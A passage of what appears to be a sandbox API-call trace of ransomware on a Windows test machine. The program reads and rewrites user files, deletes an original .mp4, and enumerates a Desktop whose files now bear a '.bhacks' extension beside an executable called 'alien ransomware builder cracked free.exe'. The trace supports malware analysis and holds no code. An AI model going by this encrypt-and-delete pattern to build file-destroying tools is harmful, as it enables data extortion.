lpBuffer=0x25be230, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x25be230*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0066.922] WriteFile (in: hFile=0x324, lpBuffer=0x25bf448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x25bf448*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0066.923] ReadFile (in: hFile=0x33c, lpBuffer=0x25be230, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x25be230*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0066.923] WriteFile (in: hFile=0x324, lpBuffer=0x25bf448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x25bf448*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0066.923] ReadFile (in: hFile=0x33c, lpBuffer=0x25be230, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x25be230*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0066.923] WriteFile (in: hFile=0x324, lpBuffer=0x25bf448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x25bf448*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0066.924] ReadFile (in: hFile=0x33c, lpBuffer=0x25be230, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x25be230*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0066.924] WriteFile (in: hFile=0x324, lpBuffer=0x25bf448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x25bf448*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0066.924] ReadFile (in: hFile=0x33c, lpBuffer=0x25be230, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x25be230*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0066.924] WriteFile (in: hFile=0x324, lpBuffer=0x25bf448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x25bf448*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0066.925] ReadFile (in: hFile=0x33c, lpBuffer=0x25be230, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x25be230*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0066.925] WriteFile (in: hFile=0x324, lpBuffer=0x25bf448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x25bf448*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0066.928] ReadFile (in: hFile=0x33c, lpBuffer=0x24c2008, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c2008*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0066.928] WriteFile (in: hFile=0x324, lpBuffer=0x24c3038*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3038*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0066.928] ReadFile (in: hFile=0x33c, lpBuffer=0x24c2008, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c2008*, lpNumberOfBytesRead=0x6feb68*=0xd34, lpOverlapped=0x0) returned 1 [0066.928] WriteFile (in: hFile=0x324, lpBuffer=0x24c3038*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3038*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0066.928] ReadFile (in: hFile=0x33c, lpBuffer=0x24c2008, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c2008*, lpNumberOfBytesRead=0x6feb68*=0x0, lpOverlapped=0x0) returned 1 [0066.929] CloseHandle (hObject=0x33c) returned 1 [0066.929] WriteFile (in: hFile=0x324, lpBuffer=0x24c3038*, nNumberOfBytesToWrite=0xd40, lpNumberOfBytesWritten=0x6fea68, lpOverlapped=0x0 | out: lpBuffer=0x24c3038*, lpNumberOfBytesWritten=0x6fea68*=0xd40, lpOverlapped=0x0) returned 1 [0066.929] CloseHandle (hObject=0x324) returned 1 [0066.931] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\ED 0nXQ VIkUvYr6\\uqU-SQkb\\kZHWiDNy.mp4", nBufferLength=0x105, lpBuffer=0x6fe640, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\ED 0nXQ VIkUvYr6\\uqU-SQkb\\kZHWiDNy.mp4", lpFilePart=0x0) returned 0x3e [0066.931] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ED 0nXQ VIkUvYr6\\uqU-SQkb\\kZHWiDNy.mp4" (normalized: "c:\\users\\fd1hvy\\desktop\\ed 0nxq vikuvyr6\\uqu-sqkb\\kzhwidny.mp4")) returned 1 [0066.976] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\", nBufferLength=0x105, lpBuffer=0x6fe690, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\", lpFilePart=0x0) returned 0x18 [0066.976] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6feb20) returned 1 [0066.976] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\" (normalized: "c:\\users\\fd1hvy\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x6fec00 | out: lpFileInformation=0x6fec00*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x256a9b70, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x256a9b70, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x3000)) returned 1 [0066.976] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6feae0) returned 1 [0066.976] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\", nBufferLength=0x105, lpBuffer=0x6fe6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\", lpFilePart=0x0) returned 0x18 [0066.976] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6feb60) returned 1 [0066.976] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\", nBufferLength=0x105, lpBuffer=0x6fe600, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\", lpFilePart=0x0) returned 0x18 [0066.976] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\*.exe", lpFindFileData=0x6fe880 | out: lpFindFileData=0x6fe880*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf99d0b80, ftCreationTime.dwHighDateTime=0x1d5dff8, ftLastAccessTime.dwLowDateTime=0xf99d0b80, ftLastAccessTime.dwHighDateTime=0x1d5dff8, ftLastWriteTime.dwLowDateTime=0xf7d34800, ftLastWriteTime.dwHighDateTime=0x1d5dff8, nFileSizeHigh=0x0, nFileSizeLow=0xf0b23, dwReserved0=0x0, dwReserved1=0x0, cFileName="alien ransomware builder cracked free.exe", cAlternateFileName="ALIENR~1.EXE")) returned 0x9bf140 [0066.976] FindClose (in: hFindFile=0x9bf140 | out: hFindFile=0x9bf140) returned 1 [0066.976] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\*", lpFindFileData=0x6fe790 | out: lpFindFileData=0x6fe790*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x256a9b70, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x256a9b70, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x9be900 [0066.977] FindNextFileW (in: hFindFile=0x9be900, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x256a9b70, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x256a9b70, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0066.977] FindNextFileW (in: hFindFile=0x9be900, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e4518a0, ftCreationTime.dwHighDateTime=0x1d5c950, ftLastAccessTime.dwLowDateTime=0xc8577a40, ftLastAccessTime.dwHighDateTime=0x1d5c9d9, ftLastWriteTime.dwLowDateTime=0xc8577a40, ftLastWriteTime.dwHighDateTime=0x1d5c9d9, nFileSizeHigh=0x0, nFileSizeLow=0x3faa, dwReserved0=0x0, dwReserved1=0x0, cFileName="-yB2WD9ZHipl10.mkv", cAlternateFileName="-YB2WD~1.MKV")) returned 1 [0066.977] FindNextFileW (in: hFindFile=0x9be900, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe913c2c0, ftCreationTime.dwHighDateTime=0x1d5c821, ftLastAccessTime.dwLowDateTime=0x951b3080, ftLastAccessTime.dwHighDateTime=0x1d5cb10, ftLastWriteTime.dwLowDateTime=0x951b3080, ftLastWriteTime.dwHighDateTime=0x1d5cb10, nFileSizeHigh=0x0, nFileSizeLow=0x4b96, dwReserved0=0x0, dwReserved1=0x0, cFileName="0LCfOxpKhBY.mkv", cAlternateFileName="0LCFOX~1.MKV")) returned 1 [0066.977] FindNextFileW (in: hFindFile=0x9be900, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdc7f6e50, ftCreationTime.dwHighDateTime=0x1d5c9da, ftLastAccessTime.dwLowDateTime=0x9744b650, ftLastAccessTime.dwHighDateTime=0x1d5c896, ftLastWriteTime.dwLowDateTime=0x9744b650, ftLastWriteTime.dwHighDateTime=0x1d5c896, nFileSizeHigh=0x0, nFileSizeLow=0x67b1, dwReserved0=0x0, dwReserved1=0x0, cFileName="63ZOACO2R_kPqlEG.m4a", cAlternateFileName="63ZOAC~1.M4A")) returned 1 [0066.977] FindNextFileW (in: hFindFile=0x9be900, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe41d58d0, ftCreationTime.dwHighDateTime=0x1d5cc31, ftLastAccessTime.dwLowDateTime=0xef3f2c90, ftLastAccessTime.dwHighDateTime=0x1d5c9eb, ftLastWriteTime.dwLowDateTime=0xef3f2c90, ftLastWriteTime.dwHighDateTime=0x1d5c9eb, nFileSizeHigh=0x0, nFileSizeLow=0xe243, dwReserved0=0x0, dwReserved1=0x0, cFileName="6yMUE.flv", cAlternateFileName="")) returned 1 [0066.977] FindNextFileW (in: hFindFile=0x9be900, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4105fa60, ftCreationTime.dwHighDateTime=0x1d5cc92, ftLastAccessTime.dwLowDateTime=0x3135af40, ftLastAccessTime.dwHighDateTime=0x1d5c931, ftLastWriteTime.dwLowDateTime=0x3135af40, ftLastWriteTime.dwHighDateTime=0x1d5c931, nFileSizeHigh=0x0, nFileSizeLow=0x8f23, dwReserved0=0x0, dwReserved1=0x0, cFileName="7jATM.wav", cAlternateFileName="")) returned 1 [0066.978] FindNextFileW (in: hFindFile=0x9be900, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81d84fe0, ftCreationTime.dwHighDateTime=0x1d5ca4c, ftLastAccessTime.dwLowDateTime=0x349b2b0, ftLastAccessTime.dwHighDateTime=0x1d5d1f2, ftLastWriteTime.dwLowDateTime=0x349b2b0, ftLastWriteTime.dwHighDateTime=0x1d5d1f2, nFileSizeHigh=0x0, nFileSizeLow=0xcdc4, dwReserved0=0x0, dwReserved1=0x0, cFileName="9gEE-.bmp", cAlternateFileName="")) returned 1 [0066.978] FindNextFileW (in: hFindFile=0x9be900, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf99d0b80, ftCreationTime.dwHighDateTime=0x1d5dff8, ftLastAccessTime.dwLowDateTime=0xf99d0b80, ftLastAccessTime.dwHighDateTime=0x1d5dff8, ftLastWriteTime.dwLowDateTime=0xf7d34800, ftLastWriteTime.dwHighDateTime=0x1d5dff8, nFileSizeHigh=0x0, nFileSizeLow=0xf0b23, dwReserved0=0x0, dwReserved1=0x0, cFileName="alien ransomware builder cracked free.exe", cAlternateFileName="ALIENR~1.EXE")) returned 1 [0066.978] FindNextFileW (in: hFindFile=0x9be900, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2336d40, ftCreationTime.dwHighDateTime=0x1d5d3d8, ftLastAccessTime.dwLowDateTime=0xb1ce5320, ftLastAccessTime.dwHighDateTime=0x1d5d3e8, ftLastWriteTime.dwLowDateTime=0xb1ce5320, ftLastWriteTime.dwHighDateTime=0x1d5d3e8, nFileSizeHigh=0x0, nFileSizeLow=0xd39f, dwReserved0=0x0, dwReserved1=0x0, cFileName="BlDya8Gp-4HPz6uNsS.xls", cAlternateFileName="BLDYA8~1.XLS")) returned 1 [0066.978] FindNextFileW (in: hFindFile=0x9be900, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x440792d0, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x440792d0, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce389e99, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0066.978] FindNextFileW (in: hFindFile=0x9be900, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x23825ba3, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x23825ba3, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x23b46f90, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x4b80, dwReserved0=0x0, dwReserved1=0x0, cFileName="DqUNIlu.gif.bhacks", cAlternateFileName="DQUNIL~1.BHA")) returned 1 [0066.978] FindNextFileW (in: hFindFile=0x9be900, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xebefe850, ftCreationTime.dwHighDateTime=0x1d5c92c, ftLastAccessTime.dwLowDateTime=0x573996f0, ftLastAccessTime.dwHighDateTime=0x1d5d1b7, ftLastWriteTime.dwLowDateTime=0x573996f0, ftLastWriteTime.dwHighDateTime=0x1d5d1b7, nFileSizeHigh=0x0, nFileSizeLow=0x9efc, dwReserved0=0x0, dwReserved1=0x0, cFileName="E hy.wav", cAlternateFileName="EHY~1.WAV")) returned 1 [0066.978] FindNextFileW (in: hFindFile=0x9be900, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67baf930, ftCreationTime.dwHighDateTime=0x1d5d160, ftLastAccessTime.dwLowDateTime=0xc1284a30, ftLastAccessTime.dwHighDateTime=0x1d5d382, ftLastWriteTime.dwLowDateTime=0xc1284a30, ftLastWriteTime.dwHighDateTime=0x1d5d382, nFileSizeHigh=0x0, nFileSizeLow=0x13ea7, dwReserved0=0x0, dwReserved1=0x0, cFileName="eacUdxJuUDfuA061.xls", cAlternateFileName="EACUDX~1.XLS")) returned 1 [0066.979] FindNextFileW (in: hFindFile=0x9be900, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5fad9210, ftCreationTime.dwHighDateTime=0x1d5cdab, ftLastAccessTime.dwLowDateTime=0xc7ac12f0, ftLastAccessTime.dwHighDateTime=0x1d5d0c7, ftLastWriteTime.dwLowDateTime=0xc7ac12f0, ftLastWriteTime.dwHighDateTime=0x1d5d0c7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ED 0nXQ VIkUvYr6", cAlternateFileName="ED0NXQ~1")) returned 1 [0066.979] FindNextFileW (in: hFindFile=0x9be900, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd4f31cb0, ftCreationTime.dwHighDateTime=0x1d5d48c, ftLastAccessTime.dwLowDateTime=0x8a825cf0, ftLastAccessTime.dwHighDateTime=0x1d5ca63, ftLastWriteTime.dwLowDateTime=0x8a825cf0, ftLastWriteTime.dwHighDateTime=0x1d5ca63, nFileSizeHigh=0x0, nFileSizeLow=0xd9f9, dwReserved0=0x0, dwReserved1=0x0, cFileName="EkLB 1ywsMV77uH53.wav", cAlternateFileName="EKLB1Y~1.WAV")) returned 1 [0066.979] FindNextFileW (in: hFindFile=0x9be900, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56e63d70, ftCreationTime.dwHighDateTime=0x1d5cf5f, ftLastAccessTime.dwLowDateTime=0x61643820, ftLastAccessTime.dwHighDateTime=0x1d5cbfd, ftLastWriteTime.dwLowDateTime=0x61643820, ftLastWriteTime.dwHighDateTime=0x1d5cbfd, nFileSizeHigh=0x0, nFileSizeLow=0x11fe4, dwReserved0=0x0, dwReserved1=0x0, cFileName="ERgdUGLd4HevVs5.odt", cAlternateFileName="ERGDUG~1.ODT")) returned 1 [0066.979] FindNextFileW (in: hFindFile=0x9be900, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5b11b8b0, ftCreationTime.dwHighDateTime=0x1d5c84e, ftLastAccessTime.dwLowDateTime=0x62c618a0, ftLastAccessTime.dwHighDateTime=0x1d5c9b9, ftLastWriteTime.dwLowDateTime=0x62c618a0, ftLastWriteTime.dwHighDateTime=0x1d5c9b9, nFileSizeHigh=0x0, nFileSizeLow=0x7189, dwReserved0=0x0, dwReserved1=0x0, cFileName="fqpL_g35J.m4a", cAlternateFileName="FQPL_G~1.M4A")) returned 1 [0066.979] FindNextFileW (in: hFindFile=0x9be900, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc87e190, ftCreationTime.dwHighDateTime=0x1d5d4f7, ftLastAccessTime.dwLowDateTime=0x337ee530, ftLastAccessTime.dwHighDateTime=0x1d5caa0, ftLastWriteTime.dwLowDateTime=0x337ee530, ftLastWriteTime.dwHighDateTime=0x1d5caa0, nFileSizeHigh=0x0, nFileSizeLow=0x1868d, dwReserved0=0x0, dwReserved1=0x0, cFileName="i6 iY_C6BkJ.m4a", cAlternateFileName="I6IY_C~1.M4A")) returned 1 [0066.979] FindNextFileW (in: hFindFile=0x9be900, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x23c2351d, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x23c2351d, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x23e85b50, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x10260, dwReserved0=0x0, dwReserved1=0x0, cFileName="j51yJlAI1.gif.bhacks", cAlternateFileName="J51YJL~1.BHA")) returned 1 [0066.980] FindNextFileW (in: hFindFile=0x9be900, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x249d9033, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x249d9033, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x24c15251, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x9420, dwReserved0=0x0, dwReserved1=0x0, cFileName="JkNoq.avi.bhacks", cAlternateFileName="JKNOQA~1.BHA")) returned 1 [0066.980] FindNextFileW (in: hFindFile=0x9be900, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24cfc8f3, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x24cfc8f3, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x24e51519, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0xfb70, dwReserved0=0x0, dwReserved1=0x0, cFileName="J_gUxI4K04bkqo7tW4.avi.bhacks", cAlternateFileName="J_GUXI~1.BHA")) returned 1 [0066.980] FindNextFileW (in: hFindFile=0x9be900, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25257692, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x25257692, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x25362701, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x4550, dwReserved0=0x0, dwReserved1=0x0, cFileName="Kz5g.mp4.bhacks", cAlternateFileName="KZ5GMP~1.BHA")) returned 1 [0066.980] FindNextFileW (in: hFindFile=0x9be900, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x23ef8520, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x23ef8520, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x2402951c, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x2da0, dwReserved0=0x0, dwReserved1=0x0, cFileName="mCQMPnOOyUYP.gif.bhacks", cAlternateFileName="MCQMPN~1.BHA")) returned 1 [0066.980] FindNextFileW (in: hFindFile=0x9be900, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54866930, ftCreationTime.dwHighDateTime=0x1d5d66a, ftLastAccessTime.dwLowDateTime=0x5f4a3830, ftLastAccessTime.dwHighDateTime=0x1d5d023, ftLastWriteTime.dwLowDateTime=0x5f4a3830, ftLastWriteTime.dwHighDateTime=0x1d5d023, nFileSizeHigh=0x0, nFileSizeLow=0xecc, dwReserved0=0x0, dwReserved1=0x0, cFileName="MdUrzCG7I8VQVwhMz8.rtf", cAlternateFileName="MDURZC~1.RTF")) returned 1 [0066.980] FindNextFileW (in: hFindFile=0x9be900, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3022d80, ftCreationTime.dwHighDateTime=0x1d5cb0f, ftLastAccessTime.dwLowDateTime=0x7517fd0, ftLastAccessTime.dwHighDateTime=0x1d5d596, ftLastWriteTime.dwLowDateTime=0x7517fd0, ftLastWriteTime.dwHighDateTime=0x1d5d596, nFileSizeHigh=0x0, nFileSizeLow=0x80c1, dwReserved0=0x0, dwReserved1=0x0, cFileName="MH23a5.bmp", cAlternateFileName="")) returned 1 [0066.981] FindNextFileW (in: hFindFile=0x9be900, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25362701, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x25362701, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x2552c345, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0xb5f0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nYVw1n1XTh2-sApcS7w.mp4.bhacks", cAlternateFileName="NYVW1N~1.BHA")) returned 1 [0066.981] FindNextFileW (in: hFindFile=0x9be900, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7910b730, ftCreationTime.dwHighDateTime=0x1d5d221, ftLastAccessTime.dwLowDateTime=0x2c63f080, ftLastAccessTime.dwHighDateTime=0x1d5cce2, ftLastWriteTime.dwLowDateTime=0x2c63f080, ftLastWriteTime.dwHighDateTime=0x1d5cce2, nFileSizeHigh=0x0, nFileSizeLow=0xd499, dwReserved0=0x0, dwReserved1=0x0, cFileName="og9u_G4EHl49Tl.flv", cAlternateFileName="OG9U_G~1.FLV")) returned 1 [0066.981] FindNextFileW (in: hFindFile=0x9be900, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa4212db0, ftCreationTime.dwHighDateTime=0x1d5d63b, ftLastAccessTime.dwLowDateTime=0xa0b30de0, ftLastAccessTime.dwHighDateTime=0x1d5d78c, ftLastWriteTime.dwLowDateTime=0xa0b30de0, ftLastWriteTime.dwHighDateTime=0x1d5d78c, nFileSizeHigh=0x0, nFileSizeLow=0x408e, dwReserved0=0x0, dwReserved1=0x0, cFileName="QgQCsu7ShKSSIL.m4a", cAlternateFileName="QGQCSU~1.M4A")) returned 1 [0066.981] FindNextFileW (in: hFindFile=0x9be900, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24f82a07, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x24f82a07, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x251263f5, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x7be0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Tab3I0y Y3.avi.bhacks", cAlternateFileName="TAB3I0~1.BHA")) returned 1 [0066.981] FindNextFileW (in: hFindFile=0x9be900, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c10d530, ftCreationTime.dwHighDateTime=0x1d5cb12, ftLastAccessTime.dwLowDateTime=0xe28a1830, ftLastAccessTime.dwHighDateTime=0x1d5d390, ftLastWriteTime.dwLowDateTime=0xe28a1830, ftLastWriteTime.dwHighDateTime=0x1d5d390, nFileSizeHigh=0x0, nFileSizeLow=0x1e8b, dwReserved0=0x0, dwReserved1=0x0, cFileName="TtFu8ac2GuQ.mp3", cAlternateFileName="TTFU8A~1.MP3")) returned 1 [0066.981] FindNextFileW (in: hFindFile=0x9be900, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c15f530, ftCreationTime.dwHighDateTime=0x1d5d49d, ftLastAccessTime.dwLowDateTime=0x2fe34c90, ftLastAccessTime.dwHighDateTime=0x1d5d801, ftLastWriteTime.dwLowDateTime=0x2fe34c90, 